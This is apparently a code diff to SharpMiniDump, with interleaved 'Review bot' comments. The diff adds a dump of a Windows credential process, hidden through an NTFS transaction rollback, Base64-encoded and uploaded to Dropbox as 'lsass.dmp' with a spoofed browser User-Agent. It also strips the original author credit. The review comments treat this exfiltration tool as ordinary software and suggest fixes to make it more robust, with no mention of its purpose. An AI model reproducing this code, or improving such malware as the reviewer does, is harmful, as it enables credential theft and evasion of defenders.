- VFT_DRV = 0x00000003,
- VFT_FONT = 0x00000004,
- VFT_STATIC_LIB = 0x00000007,
- VFT_UNKNOWN = 0x00000000,
- VFT_VXD = 0x00000005
- }
-
- enum VS_FIXEFILEINFO_FileSubTypeFlags : uint
- {
- // If the FileType is VFT_DRV
- VFT2_DRV_COMM = 0x0000000A,
- VFT2_DRV_DISPLAY = 0x00000004,
- VFT2_DRV_INSTALLABLE = 0x00000008,
- VFT2_DRV_KEYBOARD = 0x00000002,
- VFT2_DRV_LANGUAGE = 0x00000003,
- VFT2_DRV_MOUSE = 0x00000005,
- VFT2_DRV_NETWORK = 0x00000006,
- VFT2_DRV_PRINTER = 0x00000001,
- VFT2_DRV_SOUND = 0x00000009,
- VFT2_DRV_SYSTEM = 0x00000007,
- VFT2_DRV_VERSIONED_PRINTER = 0x0000000C,
-
- // If the FileType is VFT_FONT
- VFT2_FONT_RASTER = 0x00000001,
- VFT2_FONT_TRUETYPE = 0x00000003,
- VFT2_FONT_VECTOR = 0x00000002,
-
- VFT2_UNKNOWN = 0x00000000
- }
-
+
 [StructLayout(LayoutKind.Sequential, Pack = 4)]
 public struct VS_FIXEDFILEINFO
 {
@@ -1178,151 +513,14 @@ public struct MINIDUMP_CALLBACK_INFORMATION
 public MINIDUMP_CALLBACK_ROUTINE CallbackRoutine;
 public IntPtr CallbackParam;
 }
-
- public enum CONTEXT_FLAGS : uint
- {
- CONTEXT_i386 = 0x10000,
- CONTEXT_i486 = 0x10000, // same as i386
- CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP
- CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI
- CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS
- CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state
- CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,7
- CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions
- CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS,
- CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS
- }
-
- [StructLayout(LayoutKind.Sequential)]
- public struct M128A
- {
- public ulong High;
- public long Low;
-
- public override string ToString()
- {
- return string.Format("High:{0}, Low:{1}", this.High, this.Low);
- }
- }
-
- ///
- /// x64
- ///
- [StructLayout(LayoutKind.Sequential, Pack = 16)]
- public struct XSAVE_FORMAT64
- {
- public ushort ControlWord;
- public ushort StatusWord;
- public byte TagWord;
- public byte Reserved1;
- public ushort ErrorOpcode;
- public uint ErrorOffset;
- public ushort ErrorSelector;
- public ushort Reserved2;
- public uint DataOffset;
- public ushort DataSelector;
- public ushort Reserved3;
- public uint MxCsr;
- public uint MxCsr_Mask;
-
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
- public M128A[] FloatRegisters;
-
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
- public M128A[] XmmRegisters;
-
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
- public byte[] Reserved4;
- }
-
-
-
- ///
- /// x64
- ///
- [StructLayout(LayoutKind.Sequential, Pack = 16)]
- public struct CONTEXT
- {
- public ulong P1Home;
- public ulong P2Home;
- public ulong P3Home;
- public ulong P4Home;
- public ulong P5Home;
- public ulong P6Home;
-
- public CONTEXT_FLAGS ContextFlags;
- public uint MxCsr;
-
- public ushort SegCs;
- public ushort SegDs;
- public ushort SegEs;
- public ushort SegFs;
- public ushort SegGs;
- public ushort SegSs;
- public uint EFlags;
-
- public ulong Dr0;
- public ulong Dr1;
- public ulong Dr2;
- public ulong Dr3;
- public ulong Dr6;
- public ulong Dr7;
-
- public ulong Rax;
- public ulong Rcx;
- public ulong Rdx;
- public ulong Rbx;
- public ulong Rsp;
- public ulong Rbp;
- public ulong Rsi;
- public ulong Rdi;
- public ulong R8;
- public ulong R9;
- public ulong R10;
- public ulong R11;
- public ulong R12;
- public ulong R13;
- public ulong R14;
- public ulong R15;
- public ulong Rip;
-
- public XSAVE_FORMAT64 DUMMYUNIONNAME;
-
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
- public M128A[] VectorRegister;
- public ulong VectorControl;
-
- public ulong DebugControl;
- public ulong LastBranchToRip;
- public ulong LastBranchFromRip;
- public ulong LastExceptionToRip;
- public ulong LastExceptionFromRip;
- }
-
-
- public static IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId)
- {
- Natives.CLIENT_ID clientid = new Natives.CLIENT_ID();
- clientid.UniqueProcess = (IntPtr)processId;
- clientid.UniqueThread = IntPtr.Zero;
-
- IntPtr hProcess = IntPtr.Zero;
-
- Natives.OBJECT_ATTRIBUTES objAttribute = new Natives.OBJECT_ATTRIBUTES();
-
- NTSTATUS res = NativeSysCall.ZwOpenProcess10(ref hProcess, processAccess, objAttribute, ref clientid);
-
- return hProcess;
- }
-
+
 private static IntPtr GetNtDll()
 {
 return LoadLibrary("ntdll.dll");
 }
-
-
+
 public static int NtFilterToken(IntPtr TokenHandle, uint Flags, IntPtr SidsToDisable, IntPtr PrivilegesToDelete, IntPtr RestrictedSids, ref IntPtr hToken)
 {
 IntPtr proc = GetProcAddress(GetNtDll(), "NtFilterToken");
@@ -1357,56 +555,14 @@ private static IntPtr GetDbgcore()
 return LoadLibrary("dbgcore.dll");
 }
-
- public static IntPtr GetCurrentProcess()
- {
- IntPtr proc = GetProcAddress(GetKernel32(), "GetCurrentProcess");
- NativeSysCall.Delegates.GetCurrentProcess GetCurrentProcess = (NativeSysCall.Delegates.GetCurrentProcess)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.GetCurrentProcess));
- return GetCurrentProcess();
- }
-
- public static bool CloseHandle(IntPtr handle)
- {
- IntPtr proc = GetProcAddress(GetKernel32(), "CloseHandle");
- NativeSysCall.Delegates.CloseHandle CloseHandle = (NativeSysCall.Delegates.CloseHandle)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.CloseHandle));
- return CloseHandle(handle);
- }
-
- public static bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize)
- {
- IntPtr proc = GetProcAddress(GetKernelbase(), "UpdateProcThreadAttribute");
- NativeSysCall.Delegates.UpdateProcThreadAttribute UpdateProcThreadAttribute = (NativeSysCall.Delegates.UpdateProcThreadAttribute)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.UpdateProcThreadAttribute));
- return UpdateProcThreadAttribute(lpAttributeList, dwFlags, Attribute, lpValue, cbSize, lpPreviousValue, lpReturnSize);
- }
-
- public static bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize)
- {
- IntPtr proc = GetProcAddress(GetKernelbase(), "InitializeProcThreadAttributeList");
- NativeSysCall.Delegates.InitializeProcThreadAttributeList InitializeProcThreadAttributeList = (NativeSysCall.Delegates.InitializeProcThreadAttributeList)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.InitializeProcThreadAttributeList));
- return InitializeProcThreadAttributeList(lpAttributeList, dwAttributeCount, dwFlags, ref lpSize);
- }
-
+
 public static bool RtlGetVersion(ref OSVERSIONINFOEXW lpVersionInformation)
 {
 IntPtr proc = GetProcAddress(GetNtDll(), "RtlGetVersion");
 NativeSysCall.Delegates.RtlGetVersion RtlGetVersion = (NativeSysCall.Delegates.RtlGetVersion)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.RtlGetVersion));
 return RtlGetVersion(ref lpVersionInformation);
 }
-
- public static bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect)
- {
- IntPtr proc = GetProcAddress(GetKernelbase(), "VirtualProtect");
- NativeSysCall.Delegates.VirtualProtect VirtualProtect = (NativeSysCall.Delegates.VirtualProtect)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.VirtualProtect));
- return VirtualProtect(lpAddress, dwSize, flNewProtect, out lpflOldProtect);
- }
-
- public static bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint newprotect, out uint oldprotect)
- {
- IntPtr proc = GetProcAddress(GetKernelbase(), "VirtualProtectEx");
- NativeSysCall.Delegates.VirtualProtectEx VirtualProtectEx = (NativeSysCall.Delegates.VirtualProtectEx)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.VirtualProtectEx));
- return VirtualProtectEx(hProcess, lpAddress, dwSize, newprotect, out oldprotect);
- }
-
+
 public static UInt32 LdrLoadDll(IntPtr PathToFile, UInt32 dwFlags, ref Natives.UNICODE_STRING ModuleFileName, ref IntPtr ModuleHandle)
 {
 IntPtr proc = GetProcAddress(GetNtDll(), "LdrLoadDll");
@@ -1435,7 +591,7 @@ public static bool OpenProcessToken(IntPtr hProcess, UInt32 dwDesiredAccess, out
 return OpenProcessToken( hProcess, dwDesiredAccess, out hToken);
 }
- public static bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, Microsoft.Win32.SafeHandles.SafeFileHandle hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam)
+ public static bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam)
 {
 IntPtr proc = GetProcAddress(GetDbgcore(), "MiniDumpWriteDump");
 NativeSysCall.Delegates.MiniDumpWriteDump MiniDumpWriteDump = (NativeSysCall.Delegates.MiniDumpWriteDump)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.MiniDumpWriteDump));
@@ -1467,8 +623,7 @@ public static IntPtr GetProcAddress(IntPtr hModule, string procName)
 {
 return CustomLoadLibrary.GetExportAddress(hModule, procName);
 }
-
-
+
 public static IntPtr LoadLibrary(string name)
 {
 return CustomLoadLibrary.GetDllAddress(name, true);
diff --git a/SharpMiniDump/Program.cs b/SharpMiniDump/Program.cs
index 163ca1c..748cff5 100644
--- a/SharpMiniDump/Program.cs
+++ b/SharpMiniDump/Program.cs
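Review bot: The `hFile` parameter of `MiniDumpWriteDump` changes from `SafeFileHandle` to `IntPtr`, but the delegate it is forwarded to, `NativeSysCall.Delegates.MiniDumpWriteDump`, is declared outside this diff; if that delegate's `hFile` still takes a `SafeFileHandle`, the forwarding call will not compile, so it presumably was changed in lockstep and that should be confirmed. The rest of the wrapper body, including the forwarding call, lies past the end of the hunk. The new signature also drops the automatic close a `SafeFileHandle` gave the caller, which is worth stating on the wrapper: `/// <param name="hFile">Raw NT file handle; this call does not close it — the caller owns its lifetime.</param>`.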
@@ -1,27 +1,34 @@
-//
-// Author: B4rtik (@b4rtik)
-// Project: SharpMiniDump (https://github.com/b4rtik/SharpMiniDump)
-// License: BSD 3-Clause
-//
-
-using System;
+using System;
 using System.ComponentModel;
 using System.Diagnostics;
-using System.IO;
 using System.Runtime.InteropServices;
-using System.Threading;
 namespace SharpMiniDump
 {
- public class Program
 {
+
+ [DllImport("ntdll.dll")]
+ public static extern bool RtlSetCurrentTransaction(IntPtr TransactionHandle);
+
+ [DllImport("ntdll.dll")]
+ public static extern int NtRollbackTransaction(IntPtr TransactionHandle, bool Wait);
+
+ [DllImport("kernel32.dll")]
+ public static extern int GetFileSize(IntPtr FileHandle, IntPtr Test);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern IntPtr CreateFileMapping(IntPtr hFile, int lpAttributes, uint flProtect, uint dwMaximumSizeHigh, uint dwMaximumSizeLow, string lpName);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ internal static extern IntPtr MapViewOfFile(IntPtr hFileMappingObject, int dwDesiredAccess, uint dwFileOffsetHigh, uint dwFileOffsetLow, uint dwNumberOfBytesToMap);
+
 static void Main(string[] args)
 {
 Execute(args);
 }
- public static void Execute(string[] args)
+ public unsafe static void Execute(string[] args)
 {
 if (IntPtr.Size != 8)
 {
@@ -82,7 +89,7 @@ public static void Execute(string[] args)
 return;
 }
- Console.WriteLine("[*] ZwOpenProcess10 " + status);
+ Console.WriteLine("[*] ZwOpenProcess10: " + status);
 Natives.PSS_CAPTURE_FLAGS flags = Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_VA_CLONE | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLES
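Review bot: The `GetFileSize` import names its second parameter `Test` and returns `int`, which hides the Win32 contract (`DWORD GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh)`); `public static extern int GetFileSize(IntPtr hFile, IntPtr lpFileSizeHigh);` plus a comment that the `INVALID_FILE_SIZE` sentinel (`0xFFFFFFFF`) and sizes of 2 GB or more come back negative in a signed `int` would tell the next reader what the declaration actually does. `RtlSetCurrentTransaction` returns an ntdll `BOOLEAN` (one byte), while a `bool` return on a `DllImport` marshals as a four-byte `BOOL` by default; `[return: MarshalAs(UnmanagedType.U1)]` on that declaration matches the native signature. Each of the five imports also deserves a one-line `///` summary naming the Win32/NT function it binds, since the rest of the file resolves APIs indirectly and these are the only directly declared ones.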
@@ -107,10 +114,17 @@ public static void Execute(string[] args)
 return;
 }
+ IntPtr tHandle = IntPtr.Zero;
+
+ status = NativeSysCall.NtCreateTransaction10(out tHandle, Natives.MAXIMUM_ALLOWED, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, 0, 0, 0, IntPtr.Zero, IntPtr.Zero);
+ Console.WriteLine("[*] Transaction: " + status);
+
+ bool success = RtlSetCurrentTransaction(tHandle);
+
 Natives.UNICODE_STRING uFileName = new Natives.UNICODE_STRING();
 Natives.RtlInitUnicodeString(ref uFileName, @"\??\C:\Windows\Temp\dumpert.dmp");
- Microsoft.Win32.SafeHandles.SafeFileHandle hDmpFile;
+ IntPtr hDmpFile;
 IntPtr hElm = IntPtr.Zero;
 Natives.IO_STATUS_BLOCK IoStatusBlock = new Natives.IO_STATUS_BLOCK();
@@ -133,9 +147,11 @@ public static void Execute(string[] args)
 long allocationsize = 0;
+ const long READWRITE = Natives.FILE_GENERIC_READ | Natives.FILE_GENERIC_WRITE;
+
 status = NativeSysCall.NtCreateFile10(
 out hDmpFile,
- (int)Natives.FILE_GENERIC_WRITE,
+ (int)READWRITE,
 ref FileObjectAttributes,
 out IoStatusBlock,
 ref allocationsize,
@@ -144,15 +160,9 @@ public static void Execute(string[] args)
 Natives.FILE_OVERWRITE_IF,
 Natives.FILE_SYNCHRONOUS_IO_NONALERT,
 hElm, 0);
-
- if (hDmpFile.IsInvalid)
- {
- Console.WriteLine("[x] Error NtCreateFile10 " + status + " " + IoStatusBlock.status);
- NativeSysCall.ZwClose10(hProcess);
- return;
- }
-
+ success = RtlSetCurrentTransaction(IntPtr.Zero);
+
 Natives.MINIDUMP_CALLBACK_INFORMATION CallbackInfo = new Natives.MINIDUMP_CALLBACK_INFORMATION();
 CallbackInfo.CallbackRoutine = Program.MyMiniDumpWriteDumpCallback;
 CallbackInfo.CallbackParam = IntPtr.Zero;
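Review bot: `success` is assigned from `RtlSetCurrentTransaction(tHandle)` in this hunk and again from `RtlSetCurrentTransaction(IntPtr.Zero)` in the third hunk on this line, yet neither value is read anywhere visible; a named local implies a check that never comes, whereas a discard, `_ = RtlSetCurrentTransaction(tHandle);`, states that the result is deliberately ignored. The `[*] Transaction: ` line prints the `NtCreateTransaction10` status and then the flow continues regardless of it, so a comment next to that `Console.WriteLine` saying the status is informational only would spare the next reader from looking for the branch. `Execute` begins and ends outside these hunks.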
@@ -165,7 +175,7 @@ public static void Execute(string[] args) IntPtr CallbackParam = IntPtr.Zero; Console.WriteLine("[*] Target PID " + pWinVerInfo.hTargetPID); - Console.WriteLine("[*] Generating minidump.... " + pWinVerInfo.hTargetPID); + Console.WriteLine("[*] Generating minidump.... "); if (!Natives.MiniDumpWriteDump(SnapshotHandle, (uint)pWinVerInfo.hTargetPID, hDmpFile, 2, ExceptionParam, UserStreamParam, pCallbackInfo)) { @@ -174,11 +184,29 @@ public static void Execute(string[] args) return; } - hDmpFile.Dispose(); + int size = GetFileSize(hDmpFile, IntPtr.Zero); + + IntPtr hMapping = CreateFileMapping(hDmpFile, 0, (uint)Natives.PROTECT.PAGE_READONLY, 0, 0, ""); + + IntPtr data = MapViewOfFile(hMapping, Natives.FILE_MAP_READ, 0, 0, 0); + Console.WriteLine("[*] Data: 0x" + Convert.ToString((long)data, 16)); + + byte[] data_ = new byte[size]; + Marshal.Copy(data, data_, 0, size); + + string b64 = Convert.ToBase64String(data_); + + Console.WriteLine("[*] Sending " + b64.Length/(1024*1024) + " megabytes of data..."); + + SslTcpClient.RunClient("content.dropboxapi.com", "", "", b64); + + int stat = NtRollbackTransaction(tHandle, false); + + NativeSysCall.ZwClose10(hDmpFile); NativeSysCall.ZwClose10(hProcess); + NativeSysCall.ZwClose10(tHandle); - Console.WriteLine("[*] End "); - Console.WriteLine("[*] Minidump generated in " + Marshal.PtrToStringUni(uFileName.Buffer).Substring(4)); + Console.WriteLine("[*] Done! "); } private static bool UnHookNativeApi(Natives.WIN_VER_INFO pWinVerInfo) @@ -267,7 +295,6 @@ out returnLength } else { - return false; } } diff --git a/SharpMiniDump/SharpMiniDump.csproj b/SharpMiniDump/SharpMiniDump.csproj index 6a98c5f..7804724 100644 --- a/SharpMiniDump/SharpMiniDump.csproj +++ b/SharpMiniDump/SharpMiniDump.csproj @@ -66,10 +66,12 @@ + + \ No newline at end of file diff --git a/SharpMiniDump/SslTcpClient.cs b/SharpMiniDump/SslTcpClient.cs new file mode 100644 index 0000000..6902010 --- /dev/null +++ b/SharpMiniDump/SslTcpClient.cs 
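Review bot: The mapping and read-back added after `MiniDumpWriteDump` in `@@ -174,11 +184,29 @@` use every native result unchecked and release none of what they create. `GetFileSize` comes back as -1 through the `int` declaration on failure, which makes `new byte[size]` throw `OverflowException`; `MapViewOfFile` returns `IntPtr.Zero` on failure, and `Marshal.Copy` then throws instead of copying; `hMapping` is never passed to `CloseHandle` and the view is never unmapped, so unless that happens outside the hunk the mapping outlives the method. `int stat = NtRollbackTransaction(tHandle, false);` is stored and neither inspected nor printed, unlike every other status in this method, so a failed rollback is silent. The "Sending N megabytes" message divides `b64.Length` by 1024², i.e. it counts Base64 characters, about a third more than the dump actually occupies — `data_.Length` is the figure a reader of that line expects. A short comment noting that the dump is held three times at this point (mapped view, `data_`, `b64`) would also help the next maintainer understand the memory profile.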
@@ -0,0 +1,51 @@ +using System.Net; +using System.Net.Security; +using System.Net.Sockets; +using System.Security.Authentication; +using System.Security.Cryptography.X509Certificates; +using System.Text; + +namespace SharpMiniDump +{ + public class SslTcpClient + { + public static string old = null; + + public static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) + { + if (sslPolicyErrors == SslPolicyErrors.None) + { + return true; + } + return false; + } + + public static void RunClient(string machineName, string project, string token, string content) + { + TcpClient client = new TcpClient(machineName, 443); + SslStream sslStream = new SslStream(client.GetStream(), false, new RemoteCertificateValidationCallback(ValidateServerCertificate), null); + try + { + const SslProtocols _Tls12 = (SslProtocols)3072; + const SecurityProtocolType Tls12 = (SecurityProtocolType)_Tls12; + ServicePointManager.SecurityProtocol = Tls12; + sslStream.AuthenticateAsClient(machineName, null, _Tls12, false); ; + } + catch (AuthenticationException e) + { + if (e.InnerException != null) + { } + client.Close(); + return; + } + + string headers = "POST /2/files/upload HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\r\nHost: content.dropboxapi.com\r\nAuthorization: Bearer " + token + "\r\nDropbox-API-Arg: {\"path\": \"/" + project + "/lsass.dmp\",\"mode\": \"overwrite\",\"autorename\": false,\"mute\": false,\"strict_conflict\": false}\r\nContent-Type: text/plain; charset=dropbox-cors-hack\r\n"; + string length = "Content-Length: " + Encoding.UTF8.GetByteCount(content).ToString() + "\r\n\r\n"; + byte[] messsage = Encoding.UTF8.GetBytes(headers + length + content); + sslStream.Write(messsage, 0, messsage.Length); + sslStream.Flush(); + + System.Threading.Thread.Sleep(5000); + } + } +} \ No newline at end of file
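Review bot: In `RunClient`, the `ServicePointManager.SecurityProtocol = Tls12;` assignment has no effect on an `SslStream` — that property governs `ServicePoint`-based clients such as `HttpWebRequest` — and the protocol is already passed directly to `AuthenticateAsClient`, so the statement and the `Tls12` constant are dead code; `(SslProtocols)3072` is simply `SslProtocols.Tls12` and should be written by name. Neither `client` nor `sslStream` is disposed on the success path (only `client.Close()` inside the catch), the catch block's `if (e.InnerException != null) { }` is empty, and exceptions other than `AuthenticationException` (socket or I/O errors from the constructor and `Write`) are not handled at all; wrapping both objects in `using` blocks covers disposal on every path. After `Flush()` the method sleeps five seconds and returns without reading the server's response, so neither the caller nor the log can tell whether the request was accepted; at minimum a comment should state that the sleep is a guess at transmission time rather than a completion signal. The `public static string old = null;` field is never referenced and can be removed, and the stray `;` after `AuthenticateAsClient(...)` is an empty statement.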